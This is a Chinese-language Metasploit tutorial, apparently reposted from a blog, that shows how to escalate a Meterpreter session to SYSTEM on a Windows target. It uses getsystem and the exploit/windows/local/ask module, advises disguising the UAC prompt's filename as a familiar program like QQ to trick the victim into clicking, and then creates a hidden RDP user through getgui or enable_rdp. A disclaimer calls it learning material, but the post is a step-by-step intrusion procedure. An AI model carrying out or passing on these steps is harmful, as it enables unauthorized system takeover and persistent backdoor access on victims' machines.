本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关

第一步:先确定自己的权限是不是系统权限

  如果你得到meterpreter之后,不是系统权限,那么就不能创建新的用户,到后面你就会得到一个权限不足的提示。

 如下图

  

 

 那就先查看自己的权限,getuid

 

 

 我这个可能不是系统的权限,就需要进行提权,输入 getsystem

 很不幸,如果执行之后报错

 

  那就需要再换一个方法,输入bg,进入后台管理模式,并且记住这个session 1

  

 

  然后这里还需要用到 exploit/windows/local/ask

    

 

 看看它的选项 options

 

  这里的ip是监听机的ip, 我原来的session是1,而且端口是7777

  只需要设置 set session 1和 set lport 7777即可

    

 

 然后run,然后靶机会有个弹窗需要你确认,点击是即可(可能你觉得这个弹窗很低级,一般人谁会去点这个,但是刚才的设置里面是有一个filename选项的,它可以替换成任意的内容,比如QQ,这样的话,你点击的概率会大大提高)

   

 

 之后返回的meterpreter就是系统权限了

 

第二步:创建一个新的用户

 如果你输入命令 run getgui -u 用户名 -p 密码,不能创建的话,如下图 

 

 就用 run post/windows/manage/enable_rdp USERNAME=用户名 PASSWORD=密码,这个指令更加稳定,下图是执行成功了

 

  去靶机上面查看,Win+R输入netplwiz,发现成功创建!

       

 

 

 

 

 

 

 

 

   

 

原文地址:http://www.cnblogs.com/reweber/p/16929971.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性